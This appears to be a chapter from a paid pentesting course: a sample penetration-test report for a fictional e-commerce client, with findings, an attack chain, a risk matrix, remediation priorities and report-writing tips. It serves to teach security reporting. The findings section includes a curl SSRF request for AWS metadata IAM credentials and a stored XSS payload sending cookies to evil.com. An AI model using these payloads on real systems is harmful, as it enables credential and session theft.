Advanced Pentest Report

๐Ÿ”ฅ Vibe Prompt

"Write a professional pentest report: executive summary, risk assessment, findings, recommendations."

Report Template

# Penetration Test Report: Target Application

## 1. Executive Summary
XYZ Corp engaged us to pentest their e-commerce platform.
Scope: web app, mobile API, infrastructure (10 IPs)
Duration: 2 weeks (May 1-14, 2024)
Team: 2 senior pentesters

### Key Findings
- Total vulnerabilities: 12 (3 Critical, 4 High, 3 Medium, 2 Low)
- Attack chain achieved: Unauthenticated RCE via SSRF โ†’ Cloud metadata โ†’ IAM keys
- CVSS average: 7.8/10

### Risk Rating
| Severity | Count |
|----------|-------|
| Critical | 3     |
| High     | 4     |
| Medium   | 3     |
| Low      | 2     |

## 2. Scope
- Web Application: https://shop.example.com
- Mobile API: https://api.example.com/v2
- Infrastructure: 10.0.0.0/24
- Source Code: GitHub repo (static analysis only)

## 3. Methodology
- Recon: passive (OSINT) + active (scanning)
- Automated: Nessus, Burp Suite Pro, Acunetix
- Manual: Business logic, auth, IDOR, race conditions
- Mobile: Frida, Objection, APKTool

## 4. Findings Detail

### CRITICAL: SSRF to Cloud Metadata (CVSS 9.1)
**Location:** /api/fetch?url=
**Description:** The fetch endpoint doesn't validate URLs.
Attacker can access AWS metadata service.

**Reproduction:**
```bash
curl "https://shop.example.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"

Impact: Full AWS credential compromise โ†’ data breach

Recommendation:

  • Block private IP ranges (169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12)
  • Use an allowlist of approved URLs
  • Remove the feature or restrict to specific domains

HIGH: Stored XSS (CVSS 6.8)

Location: User profile name field Description: Name field not sanitized. Stored XSS in profile.

Reproduction:

POST /api/profile
{"name": "<script>fetch('https://evil.com/steal?c='+document.cookie)</script>"}

Impact: Session hijacking, admin account takeover

Recommendation:

  • Sanitize all user input (bleach, DOMPurify)
  • Implement Content-Security-Policy
  • Use HttpOnly cookies

5. Attack Chain Walkthrough

1. [Recon] Found fetch API endpoint via JS analysis
2. [SSRF] Accessed AWS metadata โ†’ retrieved IAM credentials
3. [Cloud] Used IAM keys to list S3 buckets โ†’ customer data exposed
4. [Auth] Weak JWT secret โ†’ forged admin token
5. [Impact] Full admin access to customer DB

Total time: 4 hours (automated + manual)

6. Risk Matrix

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  Impact \ Likelihood | Low | Med | High    โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  Critical            |  0  |  1  |  2      โ”‚
โ”‚  High                |  1  |  2  |  1      โ”‚
โ”‚  Medium              |  2  |  1  |  0      โ”‚
โ”‚  Low                 |  2  |  0  |  0      โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

7. Recommendations by Priority

P0 (Immediate):
  - Fix SSRF (block private IPs)
  - Rotate all IAM keys
  - Implement WAF (Cloudflare)

P1 (This sprint):
  - Sanitize all user inputs (XSS)
  - Change JWT secret to 256-bit random
  - Rate limit login endpoint

P2 (Next sprint):
  - Implement CSP headers
  - Add security headers (HSTS, X-Frame-Options)
  - Move secrets to AWS Secrets Manager

P3 (Backlog):
  - Regular dependency scanning
  - Bug bounty program
  - Security training for developers

8. Tools Used

| Tool | Purpose | |------|---------| | Burp Suite Pro | Web proxy, scanner | | Nmap | Network scanning | | Gobuster | Directory brute force | | Frida | Mobile runtime | | Nessus | Vulnerability scanning | | Metasploit | Exploitation | | Custom Python scripts | Business logic testing |

PenTesting Advanced Course Complete! ๐ŸŽ‰

  • โœ… Recon & OSINT
  • โœ… Exploit Development
  • โœ… Web Exploitation
  • โœ… Mobile & API
  • โœ… Report Writing

## Report Writing Principles
| Principle | Why |
|-----------|-----|
| Executive summary first | Non-technical audience |
| Reproduce steps clearly | Developer can verify |
| Business impact | Prioritization |
| Fix recommendations | Actionable |
| Attack chain demo | Shows real risk |
| Risk matrix | Visual priority |

## Best Practices
- Show attack chain (not just isolated bugs)
- Provide clear reproduction steps (curl commands)
- Map findings to OWASP Top 10 / CWE
- Give CVSS score for each finding
- Separate technical vs executive sections
- Include positive findings (things done right)
- Follow up after retest

Unlock Full Tutorial

This chapter is paid content. Join the project to unlock over 5000 words of deep analysis, including 10+ god-tier Prompts and real Source Code examples!